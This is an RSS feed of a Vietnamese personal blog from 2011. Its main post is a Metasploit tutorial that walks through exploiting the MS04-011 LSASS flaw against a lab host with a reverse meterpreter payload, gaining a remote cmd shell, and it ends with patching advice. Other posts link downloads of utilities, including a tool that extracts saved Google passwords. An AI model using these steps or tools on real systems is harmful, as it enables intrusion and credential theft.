<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Doan blog&#039;s (all&#039;re unofficial)</title>
	<atom:link href="http://ttdoanst.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://ttdoanst.wordpress.com</link>
	<description>Just another WordPress.com weblog</description>
	<lastBuildDate>Sun, 26 Jun 2011 05:35:27 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='ttdoanst.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://1.gravatar.com/blavatar/14e57afedd606c79dcbd36ca576580af?s=96&#038;d=http%3A%2F%2Fs2.wp.com%2Fi%2Fbuttonw-com.png</url>
		<title>Doan blog&#039;s (all&#039;re unofficial)</title>
		<link>http://ttdoanst.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://ttdoanst.wordpress.com/osd.xml" title="Doan blog&#039;s (all&#039;re unofficial)" />
	<atom:link rel='hub' href='http://ttdoanst.wordpress.com/?pushpress=hub'/>
		<item>
		<title>Metasploit Framework</title>
		<link>http://ttdoanst.wordpress.com/2011/06/26/metasploit-framework/</link>
		<comments>http://ttdoanst.wordpress.com/2011/06/26/metasploit-framework/#comments</comments>
		<pubDate>Sun, 26 Jun 2011 05:35:25 +0000</pubDate>
		<dc:creator>ttdoanst</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://ttdoanst.wordpress.com/?p=71</guid>
		<description><![CDATA[1) Giới thiệu Metasploit Framework là một môi trường dùng để kiểm tra ,tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, assembler, và Python.Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ttdoanst.wordpress.com&amp;blog=913261&amp;post=71&amp;subd=ttdoanst&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>1)  Giới thiệu</p>
<p>Metasploit Framework là một môi trường dùng để kiểm tra ,tấn công và khai thác lỗi của các service. Metasploit  được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, assembler, và Python.Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS. Bạn có thể download chương trình tại www.metasploit.com</p>
<p>Metasploit có thể tự động update bắt đầu từ version 2.2 trở đi, sử dụng script msfupdate.bat trong thư mục cài đặt</p>
<p>2)Các thành phần của Metasploit</p>
<p>Metasploit hỗ trợ  nhiều giao diện với người dùng:</p>
<p>            -console interface: dùng msfconsole.bat.  Msfconsole interface sử dụng các dòng lệnh để cấu hình, kiểm tra nên nhanh hơn và mềm dẻo hơn</p>
<p>-Web interface: dùng msfweb.bat, giao tiếp với người dùng thông qua giao diện web</p>
<p>-Command line interface: dùng msfcli.bat  </p>
<p>  Enviroment</p>
<p>            Global Enviroment:được thực thi thông qua 2 câu lệnh setg và unsetg, những options được gán ở đây sẽ mang tính toàn cục, được đưa vào tất cả các module exploits</p>
<p>            Temporary Enviroment: được thực thi thông qua 2 câu lệnh set và unset, enviroment này chỉ được đưa vào module exploit đang load hiện tại, không ảnh hưởng đến các module exploit khác</p>
<p>  Bạn có thể lưu lại enviroment mình đã cấu hình thông qua lệnh save. Môi trường đó sẽ được lưu trong /.msf/config  và sẽ được load trở lại khi user interface được thực hiện</p>
<p>  Những options nào mà chung giữa các exploits module như là: LPORT, LHOST, PAYLOAD thì bạn nên được xác định ở Global Enviroment</p>
<p>     vd:  msf&gt; setg LPORT 80</p>
<p>           msf&gt; setg LHOST 172.16.8.2  </p>
<p>3)Sử dụng  Metasploit framework</p>
<p>            1. Chọn module exploit: lựa chọn chương trình, dịch vụ lỗi mà Metasploit có hỗ trợ để khai thác</p>
<p>                        show exploits: xem các module exploit mà framework có hỗ trợ</p>
<p>                        use  exploit_name: chọn module exploit</p>
<p>                        info   exploit_name: xem thông tin về module exploit</p>
<p>                    Bạn nên cập nhật thường xuyên các lỗi dịch vụ trên www.metasploit.com hoặc qua script msfupdate.bat</p>
<p>            2. Cấu hình module exploit đã chọn</p>
<p>                        show options: Xác định những options nào cần cấu hình</p>
<p>                        set : cấu hình cho những option của module đó</p>
<p>                        Một vài module còn có những advanced options, bạn có thể xem bằng cách gõ dòng lệnh show advanceds</p>
<p>            3. Verify những options vừa cấu hình:</p>
<p>                        check: kiểm tra xem những option đã được set chính xác chưa.</p>
<p>            4. Lựa chọn target: lựa chọn hệ diều hành nào để thực hiện</p>
<p>                        show targets: những target được cung cấp bởi module đó</p>
<p>                        set: xác định target nào</p>
<p>                                    vd: smf&gt; use windows_ssl_pct</p>
<p>                                                show targets</p>
<p>                        exploit sẽ liệt kê ra những target như: winxp, winxp SP1, win2000, win2000 SP1</p>
<p>            5. Lựa chọn payload</p>
<p>                        payload là đoạn code mà sẽ chạy trên hệ thống remote machine</p>
<p>                        show payloads: liệt kê ra những payload của module exploit hiện tại</p>
<p>                        info payload_name: xem thông tin chi tiết về payload đó</p>
<p>                        set PAYLOAD payload_name: xác định payload module name.Sau khi lựa chọn payload nào, dùng lệnh show options để xem những options của payload đó</p>
<p>                        show advanced: xem những advanced options của payload đó</p>
<p>            6.Thực thi exploit</p>
<p>                        exploit: lệnh dùng để thực thi payload code. Payload sau đó sẽ cung cấp cho bạn những thông tin về hệ thống được khai thác  </p>
<p>4.Giới thiệu payload meterpreter</p>
<p>Meterpreter, viết tắt từ Meta-Interpreter là một advanced payload có trong Metasploit framework. Muc đích của nó là để cung cấp những tập lệnh để khai thác, tấn câng các máy remote computers. Nó được viết từ các developers dưới dạng shared object( DLL) files. Meterpreter và các thành phần mở rộng được thực thi trong bộ nhớ, hoàn toàn không được ghi lên đĩa nên có thể tránh được sự phát hiện từ các phần mềm chống virus</p>
<p>Meterpreter cung cấp một tập lệnh để chúng ta có thể khai thác trên các remote computers</p>
<p>            Fs: cho phép upload và download files từ các remote machine</p>
<p>            Net: cho phép xem thông tin mạng của remote machine như IP, route table</p>
<p>            Process:cho phép tạo các processes mới trên remote machine</p>
<p>            Sys: cho phép xem thông tin hệ thống của remote machine </p>
<p>Sử dụng câu lệnh</p>
<p>            use -m module1,module2,module3 [ -p path ] [ -d ]</p>
<p>               Câu lệnh use dùng để load những module mở rộng của meterpreter như: Fs, Net, Process..           </p>
<p>            loadlib -f library [ -t target ] [ -lde ]     </p>
<p>               Câu lệnh cho phép load các thư viện của remote machines            </p>
<p>            read channel_id [length]</p>
<p>              Lệnh read cho phép xem dữ liêu của remote machine trên channel đang kết nối            </p>
<p>            write channel_id</p>
<p>              Lệnh write cho phép ghi dữ liệu lên remote machine </p>
<p>            close channel_id</p>
<p>              Đóng channel mà đã kết nối với remote computer </p>
<p>            interact channel_id</p>
<p>              Bắt đầu một phiên làm việc với channel vừa thiết lập với remote machine </p>
<p>            initcrypt cipher [parameters]</p>
<p>              Mã hoá dữ liệu được gửi giữa host và remote machine </p>
<p>Sử dụng module Fs: cho phép upload và download files từ các remote machine</p>
<p>            cd directory</p>
<p>              giống lệnh cd của commandline</p>
<p>            getcwd</p>
<p>              cho biết thư mục đang làm việc hiện tại</p>
<p>            ls [filter_string]</p>
<p>              liệt kê các thư mục và tập tin</p>
<p>            upload src1 [src2 ...] dst</p>
<p>              upload file</p>
<p>            download src1 [src2 ...] dst</p>
<p>              download file  </p>
<p>Sử dụng module Net:</p>
<p>            ipconfig</p>
<p>            route</p>
<p>               xem bảng định tuyến của remote machine</p>
<p>            portfwd [ -arv ] [ -L laddr ] [ -l lport ] [ -h rhost ] [ -p rport ] [ -P ]</p>
<p>               cho phép tạo port forward giữa host và remote machine</p>
<p>Sử dụng module Process:</p>
<p>            execute -f file [ -a args ] [ -Hc ]</p>
<p>               câu lệnh execute cho phép bạn tạo ra một process mới trên remote machine và sử dụng process đó để khai thác dữ liệu</p>
<p>            kill pid1 pid2 pid3</p>
<p>               huỷ những processes đang chạy trên máy remote machine</p>
<p>            ps</p>
<p>              liệt kê những process của remote machine </p>
<p>Sử dụng module Sys:</p>
<p>            getuid</p>
<p>               cho biết username hiện tại của remote machine</p>
<p>            sysinfo</p>
<p>               cho biết thông tin về computername, OS </p>
<p>5)Ví dụ:</p>
<p> Máy localhost có địa chỉ 192.168.1.1 sẽ tấn công máy remote có địa chỉ 192.168.1.2 thông qua lỗi Lsass_ms04_011. Đây là lỗi tràn stack trong dịch vụ LSA( Local Security Authority).Lsass.exe là một process của hệ thống Microsoft Windows, chịu trách nhiệm về chứng thực local security, quản lý Active Directory  và các chính sách login. Lsass kiểm sóat việc chứng thực của cả client và server. </p>
<p>                 Msf&gt;use Lsass_ms04_011</p>
<p>                 Msf&gt;set PAYLOAD  win32_reverse_meterpreter</p>
<p>                 Msf&gt;set RHOST 192.168.1.2</p>
<p>                 Msf&gt;set LHOST 192.168.1.1</p>
<p>                 Msf&gt;exploit</p>
<p>                 Meterpreter&gt; help</p>
<p>                 Meterpreter&gt;use -m Process                  //add thêm tập lệnh của process</p>
<p>                 Meterpreter&gt;help                                     // xem các lệnh meterpreter hỗ trợ</p>
<p>                 Meterpreter&gt;ps                                        // list các process mà remote machine đang chạy</p>
<p>                 Meterpreter&gt;kill                                      // tắt các process mà remote machine đang chạy</p>
<p>                Meterpreter&gt; execute -f cmd –c           // tấn công sử dụng comandline cmd của remote machine</p>
<p>                             execute: success, process id is 3516.</p>
<p>                             execute: allocated channel 1 for new process.</p>
<p>                  meterpreter&gt; interact 1</p>
<p>                              interact: Switching to interactive console on 1&#8230;</p>
<p>                              interact: Started interactive channel 1.</p>
<p>                              Microsoft Windows XP [Version 5.1.2600]</p>
<p>                             (C) Copyright 1985-2001 Microsoft Corp.</p>
<p>                              C:\WINDOWS&gt;echo Meterpreter interactive channel in action</p>
<p>                              echo Meterpreter interactive channel in action</p>
<p>                              Meterpreter interactive channel in action</p>
<p>                  C:\WINDOWS&gt;ipconfig</p>
<p>                  Caught Ctrl-C, close interactive session? [y/N] y</p>
<p>                   meterpreter&gt;</p>
<p>6)Cách phòng chống</p>
<p>Thường xuyên cập nhật các bản vá lỗi của Microsofts. Ví dụ như để Metasploit không thể khai thác được lỗi Lsass_ms04_011, bạn phải cập nhật bản vá lỗi của Microsoft. Theo Microsoft đánh giá, đây là một lỗi nghiêm trọng, có trên hầu hết tất cả các hệ điều hành windows. Bạn nên sử dụng hotfix có number là 835732 để vá lỗi trên.          </p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ttdoanst.wordpress.com/71/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ttdoanst.wordpress.com/71/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ttdoanst.wordpress.com/71/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ttdoanst.wordpress.com/71/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/ttdoanst.wordpress.com/71/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/ttdoanst.wordpress.com/71/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/ttdoanst.wordpress.com/71/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/ttdoanst.wordpress.com/71/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ttdoanst.wordpress.com/71/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ttdoanst.wordpress.com/71/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ttdoanst.wordpress.com/71/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ttdoanst.wordpress.com/71/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ttdoanst.wordpress.com/71/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ttdoanst.wordpress.com/71/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ttdoanst.wordpress.com&amp;blog=913261&amp;post=71&amp;subd=ttdoanst&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://ttdoanst.wordpress.com/2011/06/26/metasploit-framework/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/f3ddbd23fa77f8f6aead16aa8532dc7f?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">ttdoanst</media:title>
		</media:content>
	</item>
		<item>
		<title>Dynamic DNS Update Clients</title>
		<link>http://ttdoanst.wordpress.com/2011/06/25/dynamic-dns-update-clients/</link>
		<comments>http://ttdoanst.wordpress.com/2011/06/25/dynamic-dns-update-clients/#comments</comments>
		<pubDate>Sat, 25 Jun 2011 15:24:50 +0000</pubDate>
		<dc:creator>ttdoanst</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://ttdoanst.wordpress.com/?p=68</guid>
		<description><![CDATA[Giữ địa chỉ IP hiện tại của bạn đồng bộ với máy chủ No-IP hoặc tên miền của bạn với khách hàng của chúng tôi Dynamic Update (Đức). DNS động cập nhật khách hàng của chúng tôi liên tục kiểm tra thay đổi địa chỉ IP trong nền và tự động cập nhật DNS tại [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ttdoanst.wordpress.com&amp;blog=913261&amp;post=68&amp;subd=ttdoanst&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Giữ địa chỉ IP hiện tại của bạn đồng bộ với máy chủ No-IP hoặc tên miền của bạn với khách hàng của chúng tôi Dynamic Update (Đức). DNS động cập nhật khách hàng của chúng tôi liên tục kiểm tra thay đổi địa chỉ IP trong nền và tự động cập nhật DNS tại số IP bất cứ khi nào nó thay đổi.</p>
<p><a href="http://hotfile.com/dl/122156544/ca4a509/ducsetup.exe.html">http://hotfile.com/dl/122156544/ca4a509/ducsetup.exe.html</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ttdoanst.wordpress.com/68/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ttdoanst.wordpress.com/68/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ttdoanst.wordpress.com/68/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ttdoanst.wordpress.com/68/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/ttdoanst.wordpress.com/68/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/ttdoanst.wordpress.com/68/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/ttdoanst.wordpress.com/68/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/ttdoanst.wordpress.com/68/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ttdoanst.wordpress.com/68/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ttdoanst.wordpress.com/68/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ttdoanst.wordpress.com/68/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ttdoanst.wordpress.com/68/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ttdoanst.wordpress.com/68/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ttdoanst.wordpress.com/68/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ttdoanst.wordpress.com&amp;blog=913261&amp;post=68&amp;subd=ttdoanst&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://ttdoanst.wordpress.com/2011/06/25/dynamic-dns-update-clients/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/f3ddbd23fa77f8f6aead16aa8532dc7f?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">ttdoanst</media:title>
		</media:content>
	</item>
		<item>
		<title>GoldWave 5.22</title>
		<link>http://ttdoanst.wordpress.com/2011/06/25/goldwave-5-22/</link>
		<comments>http://ttdoanst.wordpress.com/2011/06/25/goldwave-5-22/#comments</comments>
		<pubDate>Sat, 25 Jun 2011 15:14:02 +0000</pubDate>
		<dc:creator>ttdoanst</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://ttdoanst.wordpress.com/?p=65</guid>
		<description><![CDATA[GoldWave 5.22 Được biết đến như là một công cụ để tách giọng ca sỹ ra khỏi bài hát một cách hiệu quả, cho bạn một tập tin chỉ toàn nhạc nền nhằm giúp bạn có thể ca hát trên bất kỳ tập tin audio nào. Sau đây là thủ thuật chính của chương trình [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ttdoanst.wordpress.com&amp;blog=913261&amp;post=65&amp;subd=ttdoanst&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>GoldWave 5.22 Được biết đến như là một công cụ để tách giọng ca sỹ ra khỏi bài hát một cách hiệu quả, cho bạn một tập tin chỉ toàn nhạc nền nhằm giúp bạn có thể ca hát trên bất kỳ tập tin audio nào. Sau đây là thủ thuật chính của chương trình trong việc tách lời ca của ca sĩ ra khỏi bài hát. Các thủ thuật phụ khác, xin bạn tham khảo sử dụng thêm khi dùng chương trình. Bạn chọn vào Effect &gt; Stereo &gt; Reduce Vocals. Một bảng thông số hiển thị cho bạn giảm các cường độ và cao độ của ca sỹ (tính theo đơn vị dexiben db). Tuy nhiên, nếu không am hiểu gì nhiều vào cung bậc này. Bạn hãy chú ý vào thẻ Presets, trong phần này là các bộ lọc mặc định cho bạn một thông số hợp lý và hoàn toàn tin tưởng vào chế độ này. Bạn hãy chọn một bộ presets ưng ý, nhấn OK để hoàn tất.<br />
<a href="http://hotfile.com/dl/122156008/cffeace/GoldWave_5.22.7z.html">http://hotfile.com/dl/122156008/cffeace/GoldWave_5.22.7z.html</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ttdoanst.wordpress.com/65/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ttdoanst.wordpress.com/65/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ttdoanst.wordpress.com/65/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ttdoanst.wordpress.com/65/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/ttdoanst.wordpress.com/65/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/ttdoanst.wordpress.com/65/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/ttdoanst.wordpress.com/65/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/ttdoanst.wordpress.com/65/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ttdoanst.wordpress.com/65/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ttdoanst.wordpress.com/65/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ttdoanst.wordpress.com/65/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ttdoanst.wordpress.com/65/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ttdoanst.wordpress.com/65/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ttdoanst.wordpress.com/65/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ttdoanst.wordpress.com&amp;blog=913261&amp;post=65&amp;subd=ttdoanst&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://ttdoanst.wordpress.com/2011/06/25/goldwave-5-22/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/f3ddbd23fa77f8f6aead16aa8532dc7f?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">ttdoanst</media:title>
		</media:content>
	</item>
		<item>
		<title>Query Application</title>
		<link>http://ttdoanst.wordpress.com/2011/06/25/query-application/</link>
		<comments>http://ttdoanst.wordpress.com/2011/06/25/query-application/#comments</comments>
		<pubDate>Sat, 25 Jun 2011 15:12:59 +0000</pubDate>
		<dc:creator>ttdoanst</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://ttdoanst.wordpress.com/?p=61</guid>
		<description><![CDATA[Truy vấn ứng dụng Truy vấn ứng dụng kết thúc tốt đẹp tất cả các công cụ Internet kỹ thuật thông tin kỹ thuật nhất định hướng người sử dụng bao giờ sẽ cần vào một tiện ích duy nhất (và miễn phí) sạch đang tìm kiếm. IP Host Để chuyển đổi một tên máy [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ttdoanst.wordpress.com&amp;blog=913261&amp;post=61&amp;subd=ttdoanst&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Truy vấn ứng dụng<br />
Truy vấn ứng dụng kết thúc tốt đẹp tất cả các công cụ Internet kỹ thuật thông tin kỹ thuật nhất định hướng người sử dụng bao giờ sẽ cần vào một tiện ích duy nhất (và miễn phí) sạch đang tìm kiếm. IP Host Để chuyển đổi một tên máy đến một địa chỉ IP. Để IP Host không đảo ngược. Whois được chi tiết về tên miền. Sử dụng ngón tay để có được thông tin về tất cả người dùng trên một máy chủ mạng. EQ cho phép bạn lấy các thông tin động đất gần đây bằng cách sử dụng ngón tay. Nhấn nút HTML để xem thông tin tiêu đề đầy đủ và trang dữ liệu từ một máy chủ Web. Việc kiểm soát các truy vấn một máy chủ FTP FTP và cho thấy các thư mục gốc và các tập tin. Các tính năng khác cho phép bạn có được thời gian chính xác từ một máy chủ từ xa và đồng bộ hóa thời gian đồng hồ hệ thống của bạn, xác minh một máy chủ cho các dịch vụ mạng sẵn có; xác nhận kết nối đến một thiết bị đặc biệt trên mạng, hiển thị danh sách các cổng giữa máy tính và một thiết bị đặc biệt; Windows khởi chạy tiện ích cấu hình IP, và có được thông tin về kết nối Internet hiện tại. Truy vấn ứng dụng Modem hộp thoại cung cấp cho bạn thông tin về modem cài đặt, cho phép bạn gửi lệnh AT, và có thể phát hiện các cuộc gọi đến.</p>
<p><a href="http://hotfile.com/dl/122155225/52e1960/queryapp.zip.html">http://hotfile.com/dl/122155225/52e1960/queryapp.zip.html</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ttdoanst.wordpress.com/61/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ttdoanst.wordpress.com/61/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ttdoanst.wordpress.com/61/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ttdoanst.wordpress.com/61/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/ttdoanst.wordpress.com/61/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/ttdoanst.wordpress.com/61/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/ttdoanst.wordpress.com/61/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/ttdoanst.wordpress.com/61/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ttdoanst.wordpress.com/61/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ttdoanst.wordpress.com/61/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ttdoanst.wordpress.com/61/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ttdoanst.wordpress.com/61/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ttdoanst.wordpress.com/61/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ttdoanst.wordpress.com/61/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ttdoanst.wordpress.com&amp;blog=913261&amp;post=61&amp;subd=ttdoanst&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://ttdoanst.wordpress.com/2011/06/25/query-application/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/f3ddbd23fa77f8f6aead16aa8532dc7f?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">ttdoanst</media:title>
		</media:content>
	</item>
		<item>
		<title>GooglePasswordDecryptor là công cụ miễn phí để khôi phục mật khẩu tài khoản Google</title>
		<link>http://ttdoanst.wordpress.com/2011/06/25/57/</link>
		<comments>http://ttdoanst.wordpress.com/2011/06/25/57/#comments</comments>
		<pubDate>Sat, 25 Jun 2011 15:03:17 +0000</pubDate>
		<dc:creator>ttdoanst</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://ttdoanst.wordpress.com/?p=57</guid>
		<description><![CDATA[GooglePasswordDecryptor là công cụ miễn phí để khôi phục mật khẩu tài khoản Google được lưu trữ bởi rất nhiều ứng dụng. Hầu hết các ứng dụng bàn của Google như GTalk, Picassa,&#8230;đều lưu trữ mật khẩu tài khoản nhằm giúp người dùng tránh việc điền mật khẩu nhiều lần. GooglePasswordDecryptor sẽ đi qua một [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ttdoanst.wordpress.com&amp;blog=913261&amp;post=57&amp;subd=ttdoanst&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>GooglePasswordDecryptor là công cụ miễn phí để khôi phục mật khẩu tài khoản Google được lưu trữ bởi rất nhiều ứng dụng. Hầu hết các ứng dụng bàn của Google như GTalk, Picassa,&#8230;đều lưu trữ mật khẩu tài khoản nhằm giúp người dùng tránh việc điền mật khẩu nhiều lần. GooglePasswordDecryptor sẽ đi qua một loạt các ứng dụng này và giải mã mật khẩu tài khoản Google. Google sử dụng một mật khẩu tập trung để quản lý tất cả các dịch vụ của hãng như Gmail, Picassa, GTalk, iGoogle, Desktop Search,&#8230; Do các dịch vụ này được quản lý bằng một tài khoản nên việc mất mật khẩu sẽ khiến bạn mất tất cả dữ liệu. Ngoài ra, khi thử sử dụng một dịch vụ khôi phục mật khẩu Google cũng chẳng đem lại kết quả là bao trwf khi bạn đã cài đặt tài khoản thứ 2 để nhận mật khẩu và bạn nhớ tất cả các chi tiết cá nhân mà bạn đã điền khi tạo mật khẩu. Trong trường hợp này, GooglePasswordDecryptor có thể khôi phục mật khẩu Google đã được lưu bởi các ứng dụng khác nhau. Dưới đây là danh sách các ứng dụng được hỗ trợ: Google Talk, Google Picassa, Google Desktop Seach, Gmail Notifier, Internet Explorer (tất cả các phiên bản từ 4 tới <img src='http://s0.wp.com/wp-includes/images/smilies/icon_cool.gif' alt='8)' class='wp-smiley' /> và Google Chrome. Chương trình này cũng cung cấp tính năng xuất để lưu lại mật khẩu đã được khôi phục thành các định dạng HTML hoặc TEXT để sử dụng sau này.</p>
<p><a href="http://hotfile.com/dl/122154468/929c8bf/GooglePasswordDecryptor.zip.html">http://hotfile.com/dl/122154468/929c8bf/GooglePasswordDecryptor.zip.html</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ttdoanst.wordpress.com/57/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ttdoanst.wordpress.com/57/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ttdoanst.wordpress.com/57/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ttdoanst.wordpress.com/57/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/ttdoanst.wordpress.com/57/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/ttdoanst.wordpress.com/57/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/ttdoanst.wordpress.com/57/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/ttdoanst.wordpress.com/57/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ttdoanst.wordpress.com/57/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ttdoanst.wordpress.com/57/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ttdoanst.wordpress.com/57/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ttdoanst.wordpress.com/57/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ttdoanst.wordpress.com/57/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ttdoanst.wordpress.com/57/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ttdoanst.wordpress.com&amp;blog=913261&amp;post=57&amp;subd=ttdoanst&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://ttdoanst.wordpress.com/2011/06/25/57/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
